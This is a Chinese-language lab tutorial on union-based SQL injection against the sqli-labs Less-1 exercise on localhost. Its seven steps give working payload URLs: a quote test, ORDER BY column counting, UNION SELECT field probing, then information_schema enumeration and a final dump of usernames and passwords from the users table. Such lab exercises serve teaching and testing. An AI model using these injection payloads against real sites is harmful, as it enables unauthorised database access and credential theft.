sql注入

一，实验环境需求

MySQL8.0.23

PHP 5.3.29

sqli

Apache2.4.39

FTP

 二，实验步骤

第一步

通过在 id=1 后加入一个闭合符号 ' ，如果报错，再在后面加上 -- qwe 将后面注释掉，如果不报错，则证 明为字符型。命令如下：

http : //127.0.0.1/sqli-labs-master/Less-1/?id=1' -- qwe

第二步

通过 order by 查询字段数

逐级增加 order by 后面的数字，直到报错。如果逐级增加到n个字段后报错，那么证明这个字段有n-1个

http : //127.0.0.1/sqli-labs-master/Less-1/?id=1' order by n -- qwe

第三步

使用select 查询语句

用 select 查询前三个字段，目的是为了知道哪几个字段在前端显示，这样我们可以将想要查询的数

据将前端显示的字段替换掉， 注意前面的id=1 要改为 id=-1 ，目的是为了让前面的查询语句不执行，这样我们后面查询的 version() 才能够 显示出来。

http : //127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,2,3 -- qwe

http : //127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,version(),3 -- qw

第四步

查询数据库

查询当前所使用的数据库，为的是后期查询表名。

http : //127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,database(),3 -- qwe

第五步

information_schema 库

mysql5.0 以上的版本有 information_schema 库， information_schema 库中有我们所需要的表名与库

名。我们先查询 security 数据库中的所有表的名字，并以一行输出的方式输出，因为如果不一行输

出的话，前端只会显示查询的第一个表名

http : //127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' -- qwe

第六步

查询 password 和 username

现在我们知道了 security 数据库中的所有表名，我们需要查询 password 和 username ，一般情况下这些数据都会存储到users 中，所以现在查询 users 这个表中的所有字段的名字是什么。

http : //127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' -- qwe

第七步

username 和 password 的具体数据

http : //127.0.0.1/sqli-labs-master/Less-1/?id=1' and 1=2 unionselect 1,group_concat(username),group_concat(password) from users --+